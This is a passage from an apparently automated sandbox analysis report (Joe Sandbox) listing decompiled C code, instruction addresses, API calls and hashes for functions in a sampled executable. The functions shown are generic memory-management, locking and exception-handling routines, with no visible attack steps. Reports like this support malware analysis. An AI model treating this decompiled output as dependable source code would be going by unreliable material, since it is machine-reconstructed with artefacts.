												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                                                                            0x00404464
                                                                                                                            0x00404464
                                                                                                                            0x00404464
                                                                                                                            0x0040446c
                                                                                                                            0x0040446e
                                                                                                                            0x004044fc
                                                                                                                            0x004044ff
                                                                                                                            0x0040476c
                                                                                                                            0x0040476d
                                                                                                                            0x0040476e
                                                                                                                            0x00404771
                                                                                                                            0x00403d9c
                                                                                                                            0x00403d9d
                                                                                                                            0x00403d9e
                                                                                                                            0x00403d9f
                                                                                                                            0x00403da0
                                                                                                                            0x00403da3
                                                                                                                            0x00403da5
                                                                                                                            0x00403dac
                                                                                                                            0x00403db5
                                                                                                                            0x00403dba
                                                                                                                            0x00403ea1
                                                                                                                            0x00403ea3
                                                                                                                            0x00403eb6
                                                                                                                            0x00403eb8
                                                                                                                            0x00403eba
                                                                                                                            0x00403ebc
                                                                                                                            0x00403ec2
                                                                                                                            0x00403ec6
                                                                                                                            0x00403ec6
                                                                                                                            0x00403ec9
                                                                                                                            0x00403ec9
                                                                                                                            0x00403ed2
                                                                                                                            0x00403ed9
                                                                                                                            0x00403ed9
                                                                                                                            0x00403ea5
                                                                                                                            0x00403ea5
                                                                                                                            0x00403eaa
                                                                                                                            0x00403eaa
                                                                                                                            0x00403dc0
                                                                                                                            0x00403dc9
                                                                                                                            0x00403dcf
                                                                                                                            0x00403dcb
                                                                                                                            0x00403dcb
                                                                                                                            0x00403dcb
                                                                                                                            0x00403ddb
                                                                                                                            0x00403dea
                                                                                                                            0x00403df7
                                                                                                                            0x00403e67
                                                                                                                            0x00403e6e
                                                                                                                            0x00403e70
                                                                                                                            0x00403e72
                                                                                                                            0x00403e74
                                                                                                                            0x00403e7a
                                                                                                                            0x00403e7e
                                                                                                                            0x00403e7e
                                                                                                                            0x00403e81
                                                                                                                            0x00403e81
                                                                                                                            0x00403e91
                                                                                                                            0x00403e98
                                                                                                                            0x00403e98
                                                                                                                            0x00403df9
                                                                                                                            0x00403df9
                                                                                                                            0x00403e05
                                                                                                                            0x00403e0b
                                                                                                                            0x00000000
                                                                                                                            0x00403e0d
                                                                                                                            0x00403e1e
                                                                                                                            0x00403e22
                                                                                                                            0x00403e24
                                                                                                                            0x00403e24
                                                                                                                            0x00403e3a
                                                                                                                            0x00000000
                                                                                                                            0x00403e52
                                                                                                                            0x00403e54
                                                                                                                            0x00403e57
                                                                                                                            0x00403e60
                                                                                                                            0x00403e63
                                                                                                                            0x00403e63
                                                                                                                            0x00403e3a
                                                                                                                            0x00403e0b
                                                                                                                            0x00403df7
                                                                                                                            0x00403ee7
                                                                                                                            0x00404777
                                                                                                                            0x00404777
                                                                                                                            0x00404779
                                                                                                                            0x00404779
                                                                                                                            0x00404505
                                                                                                                            0x00404507
                                                                                                                            0x0040450a
                                                                                                                            0x0040450b
                                                                                                                            0x0040450e
                                                                                                                            0x00404511
                                                                                                                            0x00404514
                                                                                                                            0x00404516
                                                                                                                            0x00404517
                                                                                                                            0x0040462c
                                                                                                                            0x0040462f
                                                                                                                            0x00404631
                                                                                                                            0x00404724
                                                                                                                            0x0040472f
                                                                                                                            0x00404736
                                                                                                                            0x00404738
                                                                                                                            0x0040473b
                                                                                                                            0x00404740
                                                                                                                            0x00404741
                                                                                                                            0x00404743
                                                                                                                            0x00000000
                                                                                                                            0x00404745
                                                                                                                            0x00404745
                                                                                                                            0x0040474b
                                                                                                                            0x0040474d
                                                                                                                            0x0040474d
                                                                                                                            0x00404750
                                                                                                                            0x00404758
                                                                                                                            0x0040475f
                                                                                                                            0x0040476a
                                                                                                                            0x0040476a
                                                                                                                            0x00404637
                                                                                                                            0x00404637
                                                                                                                            0x0040463a
                                                                                                                            0x0040463d
                                                                                                                            0x0040463f
                                                                                                                            0x00000000
                                                                                                                            0x00404645
                                                                                                                            0x00404645
                                                                                                                            0x0040464c
                                                                                                                            0x004046a9
                                                                                                                            0x004046a9
                                                                                                                            0x004046ae
                                                                                                                            0x004046b4
                                                                                                                            0x004046b9
                                                                                                                            0x004046ba
                                                                                                                            0x004046ba
                                                                                                                            0x004046c6
                                                                                                                            0x004046d7
                                                                                                                            0x004046dd
                                                                                                                            0x004046dd
                                                                                                                            0x004046df
                                                                                                                            0x004046ec
                                                                                                                            0x004046f3
                                                                                                                            0x004046f7
                                                                                                                            0x004046f9
                                                                                                                            0x004046ff
                                                                                                                            0x00404701
                                                                                                                            0x00404703
                                                                                                                            0x00404703
                                                                                                                            0x004046e1
                                                                                                                            0x004046e1
                                                                                                                            0x004046e5
                                                                                                                            0x004046e5
                                                                                                                            0x00404708
                                                                                                                            0x00404708
                                                                                                                            0x0040470a
                                                                                                                            0x0040470d
                                                                                                                            0x00404714
                                                                                                                            0x00404716
                                                                                                                            0x0040471a
                                                                                                                            0x0040464e
                                                                                                                            0x0040464e
                                                                                                                            0x00404653
                                                                                                                            0x0040465b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040465d
                                                                                                                            0x0040465f
                                                                                                                            0x00404666
                                                                                                                            0x00000000
                                                                                                                            0x00404668
                                                                                                                            0x0040466c
                                                                                                                            0x00404671
                                                                                                                            0x00404672
                                                                                                                            0x00404678
                                                                                                                            0x00404680
                                                                                                                            0x00404686
                                                                                                                            0x0040468b
                                                                                                                            0x0040468c
                                                                                                                            0x00000000
                                                                                                                            0x0040468c
                                                                                                                            0x00404680
                                                                                                                            0x00000000
                                                                                                                            0x00404666
                                                                                                                            0x00404695
                                                                                                                            0x00404698
                                                                                                                            0x0040469b
                                                                                                                            0x0040469d
                                                                                                                            0x0040471d
                                                                                                                            0x0040471d
                                                                                                                            0x00000000
                                                                                                                            0x0040469f
                                                                                                                            0x0040469f
                                                                                                                            0x004046a2
                                                                                                                            0x004046a5
                                                                                                                            0x004046a7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004046a7
                                                                                                                            0x0040469d
                                                                                                                            0x0040464c
                                                                                                                            0x0040463f
                                                                                                                            0x0040451d
                                                                                                                            0x00404520
                                                                                                                            0x00404522
                                                                                                                            0x0040452c
                                                                                                                            0x00404532
                                                                                                                            0x00404549
                                                                                                                            0x00404549
                                                                                                                            0x00404555
                                                                                                                            0x0040455b
                                                                                                                            0x0040455d
                                                                                                                            0x00404564
                                                                                                                            0x00404566
                                                                                                                            0x0040456b
                                                                                                                            0x00404573
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404575
                                                                                                                            0x00404577
                                                                                                                            0x0040457e
                                                                                                                            0x00000000
                                                                                                                            0x00404580
                                                                                                                            0x00404583
                                                                                                                            0x00404588
                                                                                                                            0x0040458e
                                                                                                                            0x00404596
                                                                                                                            0x0040459b
                                                                                                                            0x004045a0
                                                                                                                            0x00000000
                                                                                                                            0x004045a0
                                                                                                                            0x00404596
                                                                                                                            0x00000000
                                                                                                                            0x0040457e
                                                                                                                            0x004045a9
                                                                                                                            0x004045a9
                                                                                                                            0x004045a9
                                                                                                                            0x004045ae
                                                                                                                            0x004045b1
                                                                                                                            0x004045b3
                                                                                                                            0x004045b6
                                                                                                                            0x004045b9
                                                                                                                            0x004045c4
                                                                                                                            0x004045c6
                                                                                                                            0x004045c9
                                                                                                                            0x004045cb
                                                                                                                            0x004045cd
                                                                                                                            0x004045d3
                                                                                                                            0x004045d5
                                                                                                                            0x004045d5
                                                                                                                            0x004045bb
                                                                                                                            0x004045be
                                                                                                                            0x004045be
                                                                                                                            0x004045da
                                                                                                                            0x004045e0
                                                                                                                            0x004045e4
                                                                                                                            0x004045ea
                                                                                                                            0x004045f1
                                                                                                                            0x004045f1
                                                                                                                            0x004045f6
                                                                                                                            0x00404603
                                                                                                                            0x00404534
                                                                                                                            0x00404534
                                                                                                                            0x0040453a
                                                                                                                            0x00404604
                                                                                                                            0x00404608
                                                                                                                            0x0040460d
                                                                                                                            0x0040460f
                                                                                                                            0x00404611
                                                                                                                            0x00404619
                                                                                                                            0x00404620
                                                                                                                            0x00404625
                                                                                                                            0x00404625
                                                                                                                            0x0040462b
                                                                                                                            0x00404540
                                                                                                                            0x00404540
                                                                                                                            0x00404545
                                                                                                                            0x00404547
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404547
                                                                                                                            0x0040453a
                                                                                                                            0x00404524
                                                                                                                            0x00404524
                                                                                                                            0x00404528
                                                                                                                            0x00404528
                                                                                                                            0x00404522
                                                                                                                            0x00404517
                                                                                                                            0x00404474
                                                                                                                            0x00404474
                                                                                                                            0x00404476
                                                                                                                            0x0040447a
                                                                                                                            0x0040447d
                                                                                                                            0x0040447f
                                                                                                                            0x004044b8
                                                                                                                            0x004044bc
                                                                                                                            0x004044bd
                                                                                                                            0x004044bf
                                                                                                                            0x004044c1
                                                                                                                            0x004044c3
                                                                                                                            0x004044c6
                                                                                                                            0x004044c8
                                                                                                                            0x004044ca
                                                                                                                            0x004044cf
                                                                                                                            0x004044d1
                                                                                                                            0x004044d3
                                                                                                                            0x004044d9
                                                                                                                            0x004044db
                                                                                                                            0x004044db
                                                                                                                            0x004044e2
                                                                                                                            0x004044e2
                                                                                                                            0x004044e5
                                                                                                                            0x004044e7
                                                                                                                            0x004044f0
                                                                                                                            0x004044f5
                                                                                                                            0x004044f5
                                                                                                                            0x004044f7
                                                                                                                            0x004044f8
                                                                                                                            0x004044f9
                                                                                                                            0x004044fa
                                                                                                                            0x00404481
                                                                                                                            0x00404481
                                                                                                                            0x00404488
                                                                                                                            0x0040448a
                                                                                                                            0x00404490
                                                                                                                            0x00404492
                                                                                                                            0x00404494
                                                                                                                            0x00404499
                                                                                                                            0x0040449b
                                                                                                                            0x0040449d
                                                                                                                            0x0040449f
                                                                                                                            0x004044a1
                                                                                                                            0x004044ac
                                                                                                                            0x004044b1
                                                                                                                            0x004044b1
                                                                                                                            0x004044b3
                                                                                                                            0x004044b4
                                                                                                                            0x004044b5
                                                                                                                            0x0040448c
                                                                                                                            0x0040448c
                                                                                                                            0x0040448d
                                                                                                                            0x0040448e
                                                                                                                            0x0040448e
                                                                                                                            0x0040448a
                                                                                                                            0x0040447f

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                                                            • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                                                                            • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                                                                            • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041F7A0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 68%
                                                                                                                            			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                                                                                            0x0041f7a0
                                                                                                                            0x0041f7a1
                                                                                                                            0x0041f7ad
                                                                                                                            0x0041f7b3
                                                                                                                            0x0041f7b9
                                                                                                                            0x0041f7bf
                                                                                                                            0x0041f7c5
                                                                                                                            0x0041f7ca
                                                                                                                            0x0041f7cb
                                                                                                                            0x0041f7d0
                                                                                                                            0x0041f7d3
                                                                                                                            0x0041f7df
                                                                                                                            0x0041f7df
                                                                                                                            0x0041f7e2
                                                                                                                            0x0041f7f0
                                                                                                                            0x0041f7f5
                                                                                                                            0x0041f7e4
                                                                                                                            0x0041f7e4
                                                                                                                            0x0041f7ff
                                                                                                                            0x0041f804
                                                                                                                            0x0041f7e6
                                                                                                                            0x0041f7e9
                                                                                                                            0x0041f80e
                                                                                                                            0x0041f813
                                                                                                                            0x0041f7eb
                                                                                                                            0x0041f81d
                                                                                                                            0x0041f822
                                                                                                                            0x0041f822
                                                                                                                            0x0041f7e9
                                                                                                                            0x0041f7e4
                                                                                                                            0x0041f82d
                                                                                                                            0x0041f840
                                                                                                                            0x0041f845
                                                                                                                            0x0041f84e
                                                                                                                            0x0041f86c
                                                                                                                            0x0041f871
                                                                                                                            0x0041f873
                                                                                                                            0x00000000
                                                                                                                            0x0041f879
                                                                                                                            0x0041f882
                                                                                                                            0x0041f888
                                                                                                                            0x0041f8a0
                                                                                                                            0x0041f8b1
                                                                                                                            0x0041f8bc
                                                                                                                            0x0041f8c2
                                                                                                                            0x0041f8cc
                                                                                                                            0x0041f8d2
                                                                                                                            0x0041f8d9
                                                                                                                            0x0041f8df
                                                                                                                            0x0041f8ec
                                                                                                                            0x0041f8f5
                                                                                                                            0x0041f8fa
                                                                                                                            0x0041f90c
                                                                                                                            0x0041f911
                                                                                                                            0x0041f915
                                                                                                                            0x0041f915
                                                                                                                            0x0041f91e
                                                                                                                            0x0041f924
                                                                                                                            0x0041f92e
                                                                                                                            0x0041f934
                                                                                                                            0x0041f93b
                                                                                                                            0x0041f941
                                                                                                                            0x0041f94e
                                                                                                                            0x0041f957
                                                                                                                            0x0041f95c
                                                                                                                            0x0041f96e
                                                                                                                            0x0041f973
                                                                                                                            0x0041f977
                                                                                                                            0x0041f97a
                                                                                                                            0x0041f97d
                                                                                                                            0x0041f988
                                                                                                                            0x0041f998
                                                                                                                            0x0041f9a5

                                                                                                                            APIs
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                                                                              • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                                                            • String ID: 0@$8@$@@$H@
                                                                                                                            • API String ID: 902310565-4161625419
                                                                                                                            • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                                                            • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                                                                            • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                                                                            • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406688 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                                                                            0x0040668f
                                                                                                                            0x00406691
                                                                                                                            0x00406693
                                                                                                                            0x00406696
                                                                                                                            0x00406696
                                                                                                                            0x0040669d
                                                                                                                            0x004066a4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004066b2
                                                                                                                            0x004066b9
                                                                                                                            0x00406751
                                                                                                                            0x00406751
                                                                                                                            0x00406751
                                                                                                                            0x00406755
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406760
                                                                                                                            0x00406766
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406768
                                                                                                                            0x00406768
                                                                                                                            0x0040676d
                                                                                                                            0x00406773
                                                                                                                            0x0040677a
                                                                                                                            0x00406784
                                                                                                                            0x00406789
                                                                                                                            0x00406790
                                                                                                                            0x00406797
                                                                                                                            0x004067a5
                                                                                                                            0x004067b3
                                                                                                                            0x004067a7
                                                                                                                            0x004067af
                                                                                                                            0x004067af
                                                                                                                            0x004067a5
                                                                                                                            0x004067b9
                                                                                                                            0x004067db
                                                                                                                            0x004067e4
                                                                                                                            0x004067e8
                                                                                                                            0x004067ec
                                                                                                                            0x00000000
                                                                                                                            0x004067bb
                                                                                                                            0x004067bb
                                                                                                                            0x004067c0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004067cc
                                                                                                                            0x004067d2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004067d4
                                                                                                                            0x00000000
                                                                                                                            0x004067d4
                                                                                                                            0x004067bb
                                                                                                                            0x004067f1
                                                                                                                            0x004067f1
                                                                                                                            0x00406800
                                                                                                                            0x00406807
                                                                                                                            0x0040680a
                                                                                                                            0x0040680a
                                                                                                                            0x00000000
                                                                                                                            0x00406800
                                                                                                                            0x00000000
                                                                                                                            0x00406751
                                                                                                                            0x004066c4
                                                                                                                            0x004066ca
                                                                                                                            0x004066d0
                                                                                                                            0x0040672c
                                                                                                                            0x0040672f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406736
                                                                                                                            0x0040673e
                                                                                                                            0x00406744
                                                                                                                            0x0040674f
                                                                                                                            0x00000000
                                                                                                                            0x0040674f
                                                                                                                            0x00406746
                                                                                                                            0x00000000
                                                                                                                            0x00406746
                                                                                                                            0x00000000
                                                                                                                            0x004066d2
                                                                                                                            0x004066d5
                                                                                                                            0x00000000
                                                                                                                            0x004066e4
                                                                                                                            0x004066e4
                                                                                                                            0x004066e4
                                                                                                                            0x00000000
                                                                                                                            0x004066ed
                                                                                                                            0x004066f0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004066f5
                                                                                                                            0x0040671e
                                                                                                                            0x00406722
                                                                                                                            0x00406727
                                                                                                                            0x0040672a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040672a
                                                                                                                            0x004066fe
                                                                                                                            0x00406704
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040670b
                                                                                                                            0x0040670e
                                                                                                                            0x00406715
                                                                                                                            0x00000000
                                                                                                                            0x00406715
                                                                                                                            0x00406811
                                                                                                                            0x0040681c

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                                                                                            • GetTickCount.KERNEL32 ref: 004066BF
                                                                                                                            • GetTickCount.KERNEL32 ref: 004066D7
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                                                                                            • GetTickCount.KERNEL32 ref: 00406731
                                                                                                                            • GetTickCount.KERNEL32 ref: 00406768
                                                                                                                            • GetTickCount.KERNEL32 ref: 00406792
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
